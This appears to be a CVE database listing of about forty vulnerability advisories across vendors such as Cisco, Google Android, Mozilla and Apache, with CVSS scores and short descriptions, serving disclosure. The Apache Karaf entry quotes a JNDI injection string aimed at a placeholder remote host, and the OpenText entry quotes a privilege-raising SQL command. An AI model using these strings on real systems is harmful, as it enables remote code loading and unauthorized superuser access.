Total
11829 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2010-3050 | 1 Cisco | 1 Ios | 2025-04-20 | 6.8 MEDIUM | 6.5 MEDIUM |
|
Cisco IOS before 12.2(33)SXI allows remote authenticated users to cause a denial of service (device reboot).
|
|||||
| CVE-2017-10908 | 1 Dena | 1 H2o | 2025-04-20 | 5.0 MEDIUM | 7.5 HIGH |
|
H2O version 2.2.3 and earlier allows remote attackers to cause a denial of service in the server via specially crafted HTTP/2 header.
|
|||||
| CVE-2017-8566 | 1 Microsoft | 2 Windows 10, Windows Server 2016 | 2025-04-20 | 4.4 MEDIUM | 7.0 HIGH |
|
Microsoft Windows 1607, 1703, and Windows Server 2016 allows an elevation of privilege vulnerability due to Windows Input Method Editor (IME) improperly handling parameters in a method of a DCOM class, aka "Windows IME Elevation of Privilege Vulnerability".
|
|||||
| CVE-2017-12274 | 1 Cisco | 11 Aironet 1562 Firmware, Aironet 1562d, Aironet 1562e and 8 more | 2025-04-20 | 6.1 MEDIUM | 6.5 MEDIUM |
|
A vulnerability in Extensible Authentication Protocol (EAP) ingress frame processing for the Cisco Aironet 1560, 2800, and 3800 Series Access Points could allow an unauthenticated, Layer 2 radio frequency (RF) adjacent attacker to cause the Access Point (AP) to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient validation of the EAP frame. An attacker could exploit this vulnerability by sending a malformed EAP frame to the targeted device. A succes ...
Show More |
|||||
| CVE-2017-7220 | 1 Opentext | 1 Documentum Content Server | 2025-04-20 | 9.0 HIGH | 8.8 HIGH |
|
OpenText Documentum Content Server allows superuser access via sys_obj_save or save of a crafted object, followed by an unauthorized "UPDATE dm_dbo.dm_user_s SET user_privileges=16" command, aka an "RPC save-commands" attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4532.
|
|||||
| CVE-2016-6266 | 1 Trendmicro | 1 Smart Protection Server | 2025-04-20 | 6.5 MEDIUM | 8.8 HIGH |
|
ccca_ajaxhandler.php in Trend Micro Smart Protection Server 2.5 before build 2200, 2.6 before build 2106, and 3.0 before build 1330 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) host or (2) apikey parameter in a register action, (3) enable parameter in a save_stting action, or (4) host or (5) apikey parameter in a test_connection action.
|
|||||
| CVE-2015-1443 | 1 Fli4l | 1 Fli4l | 2025-04-20 | 9.0 HIGH | 8.8 HIGH |
|
The httpd package in fli4l before 3.10.1 and 4.0 before 2015-01-30 allows remote attackers to execute arbitrary code.
|
|||||
| CVE-2017-12277 | 1 Cisco | 6 Firepower 4110 Next-generation Firewall, Firepower 4120 Next-generation Firewall, Firepower 4140 Next-generation Firewall and 3 more | 2025-04-20 | 9.0 HIGH | 8.8 HIGH |
|
A vulnerability in the Smart Licensing Manager service of the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges. The vulnerability is due to insufficient input validation of certain Smart Licensing configuration parameters. An authenticated attacker could exploit the vulnerability by configuring a malicious URL within the affected ...
Show More |
|||||
| CVE-2017-0872 | 1 Google | 1 Android | 2025-04-20 | 9.3 HIGH | 8.8 HIGH |
|
A remote code execution vulnerability in the Android media framework (libskia). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65290323.
|
|||||
| CVE-2017-6463 | 1 Ntp | 1 Ntp | 2025-04-20 | 4.0 MEDIUM | 6.5 MEDIUM |
|
NTP before 4.2.8p10 and 4.3.x before 4.3.94 allows remote authenticated users to cause a denial of service (daemon crash) via an invalid setting in a :config directive, related to the unpeer option.
|
|||||
| CVE-2022-46701 | 1 Apple | 4 Ipados, Iphone Os, Macos and 1 more | 2025-04-18 | N/A | 7.8 HIGH |
|
The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.
|
|||||
| CVE-2024-55653 | 1 Pwndoc Project | 1 Pwndoc | 2025-04-18 | N/A | 6.5 MEDIUM |
|
PwnDoc is a penetration test report generator. In versions up to and including 0.5.3, an authenticated user is able to crash the backend by raising a `UnhandledPromiseRejection` on audits which exits the backend. The user doesn't need to know the audit id, since a bad audit id will also raise the rejection. With the backend being unresponsive, the whole application becomes unusable for all users of the application. As of time of publication, no known patches are available.
|
|||||
| CVE-2022-20592 | 1 Google | 1 Android | 2025-04-18 | N/A | 5.5 MEDIUM |
|
In ppmp_validate_secbuf of drm_fw.c, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238976908References: N/A
|
|||||
| CVE-2022-20590 | 1 Google | 1 Android | 2025-04-18 | N/A | 5.5 MEDIUM |
|
In valid_va_sec_mfc_check of drm_access_control.c, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238932493References: N/A
|
|||||
| CVE-2022-20589 | 1 Google | 1 Android | 2025-04-18 | N/A | 4.4 MEDIUM |
|
In valid_va_secbuf_check of drm_access_control.c, there is a possible ID due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238841928References: N/A
|
|||||
| CVE-2022-20587 | 1 Google | 1 Android | 2025-04-18 | N/A | 7.8 HIGH |
|
In ppmp_validate_wsm of drm_fw.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238720411References: N/A
|
|||||
| CVE-2022-20586 | 1 Google | 1 Android | 2025-04-18 | N/A | 7.8 HIGH |
|
In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238718854References: N/A
|
|||||
| CVE-2022-20585 | 1 Google | 1 Android | 2025-04-18 | N/A | 7.8 HIGH |
|
In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238716781References: N/A
|
|||||
| CVE-2022-20584 | 1 Google | 1 Android | 2025-04-18 | N/A | 7.8 HIGH |
|
In page_number of shared_mem.c, there is a possible code execution in secure world due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238366009References: N/A
|
|||||
| CVE-2024-55630 | 1 Joplin Project | 1 Joplin | 2025-04-18 | N/A | 3.3 LOW |
|
Joplin is a free, open source note taking and to-do application, which can handle a large number of notes organised into notebooks. Joplin's HTML sanitizer allows the `name` attribute to be specified. If `name` is set to the same value as an existing `document` property (e.g. `querySelector`), that property is replaced with the element. This vulnerability's only known impact is denial of service. The note viewer fails to refresh until closed and re-opened with a different note. This issue has be ...
Show More |
|||||
| CVE-2022-42534 | 1 Google | 1 Android | 2025-04-17 | N/A | 7.8 HIGH |
|
In trusty_ffa_mem_reclaim of shared-mem-smcall.c, there is a possible privilege escalation due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237838301References: N/A
|
|||||
| CVE-2021-28655 | 1 Apache | 1 Zeppelin | 2025-04-17 | N/A | 6.5 MEDIUM |
|
The improper Input Validation vulnerability in "”Move folder to Trash” feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.
|
|||||
| CVE-2020-6998 | 1 Rockwellautomation | 18 Armor Compact Guardlogix 5370, Armor Compact Guardlogix 5370 Firmware, Compact Guardlogix 5370 and 15 more | 2025-04-17 | N/A | 5.8 MEDIUM |
|
The connection establishment algorithm found in Rockwell Automation CompactLogix 5370 and ControlLogix 5570 versions 33 and prior does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP packet requests to a controller, which may cause denial-of-service conditions in communications with other products.
|
|||||
| CVE-2022-46401 | 1 Microchip | 24 Bm64, Bm64 Firmware, Bm70 and 21 more | 2025-04-17 | N/A | 5.4 MEDIUM |
|
The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) accepts PauseEncReqPlainText before pairing is complete.
|
|||||
| CVE-2022-46328 | 1 Huawei | 2 Emui, Harmonyos | 2025-04-17 | N/A | 7.5 HIGH |
|
Some smartphones have the input validation vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.
|
|||||
| CVE-2022-44756 | 1 Hcltechsw | 1 Bigfix Insights For Vulnerability Remediation | 2025-04-16 | N/A | 6.4 MEDIUM |
|
Insights for Vulnerability Remediation (IVR) is vulnerable to improper input validation. This may lead to information disclosure. This requires privileged access.
|
|||||
| CVE-2022-25940 | 1 Lite-server Project | 1 Lite-server | 2025-04-16 | N/A | 7.5 HIGH |
|
All versions of package lite-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.
|
|||||
| CVE-2022-22749 | 1 Mozilla | 1 Firefox | 2025-04-16 | N/A | 4.3 MEDIUM |
|
When scanning QR codes, Firefox for Android would have allowed navigation to some URLs that do not point to web content.<br>*This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 96.
|
|||||
| CVE-2024-20758 | 1 Adobe | 2 Commerce, Magento | 2025-04-16 | N/A | 9.0 CRITICAL |
|
Adobe Commerce versions 2.4.6-p4, 2.4.5-p6, 2.4.4-p7, 2.4.7-beta3 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution on the underlying filesystem. Exploitation of this issue does not require user interaction, but the attack complexity is high.
|
|||||
| CVE-2025-3677 | 2025-04-16 | 4.3 MEDIUM | 5.3 MEDIUM | ||
|
A vulnerability classified as critical was found in lm-sys fastchat up to 0.2.36. This vulnerability affects the function split_files/apply_delta_low_cpu_mem of the file fastchat/model/apply_delta.py. The manipulation leads to deserialization. An attack has to be approached locally.
|
|||||
| CVE-2024-26290 | 2025-04-15 | N/A | N/A | ||
|
Improper Input Validation vulnerability in Avid Avid NEXIS E-series on Linux, Avid Avid NEXIS F-series on Linux, Avid Avid NEXIS PRO+ on Linux, Avid System Director Appliance (SDA+) on Linux allows code execution on underlying operating system with root permissions.This issue affects Avid NEXIS E-series: before 2024.6.0; Avid NEXIS F-series: before 2024.6.0; Avid NEXIS PRO+: before 2024.6.0; System Director Appliance (SDA+): before 2024.6.0.
|
|||||
| CVE-2023-36505 | 1 Ninjaforms | 1 Ninja Forms | 2025-04-15 | N/A | 6.8 MEDIUM |
|
Improper Input Validation vulnerability in Saturday Drive Ninja Forms Contact Form.This issue affects Ninja Forms Contact Form : from n/a through 3.6.24.
|
|||||
| CVE-2022-34476 | 1 Mozilla | 1 Firefox | 2025-04-15 | N/A | 9.8 CRITICAL |
|
ASN.1 parsing of an indefinite SEQUENCE inside an indefinite GROUP could have resulted in the parser accepting malformed ASN.1. This vulnerability affects Firefox < 102.
|
|||||
| CVE-2025-32076 | 2025-04-15 | N/A | N/A | ||
|
Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Visual Data Extension allows HTTP DoS.This issue affects Mediawiki - Visual Data Extension: from 1.39 through 1.43.
|
|||||
| CVE-2025-32075 | 2025-04-15 | N/A | N/A | ||
|
Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Tabs Extension allows Code Injection.This issue affects Mediawiki - Tabs Extension: from 1.39 through 1.43.
|
|||||
| CVE-2025-32077 | 2025-04-15 | N/A | N/A | ||
|
Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Extension:SimpleCalendar allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Extension:SimpleCalendar: from 1.39 through 1.43.
|
|||||
| CVE-2025-3622 | 2025-04-15 | 5.2 MEDIUM | 5.5 MEDIUM | ||
|
A vulnerability, which was classified as critical, has been found in Xorbits Inference up to 1.4.1. This issue affects the function load of the file xinference/thirdparty/cosyvoice/cli/model.py. The manipulation leads to deserialization.
|
|||||
| CVE-2025-3590 | 2025-04-15 | 6.5 MEDIUM | 6.3 MEDIUM | ||
|
A vulnerability has been found in Adianti Framework up to 8.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 8.1 is able to address this issue. It is recommended to upgrade the affected component.
|
|||||
| CVE-2022-40145 | 1 Apache | 1 Karaf | 2025-04-15 | N/A | 9.8 CRITICAL |
|
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This ...
Show More |
|||||
| CVE-2022-40898 | 1 Wheel Project | 1 Wheel | 2025-04-15 | N/A | 7.5 HIGH |
|
An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker controlled input to wheel cli.
|
|||||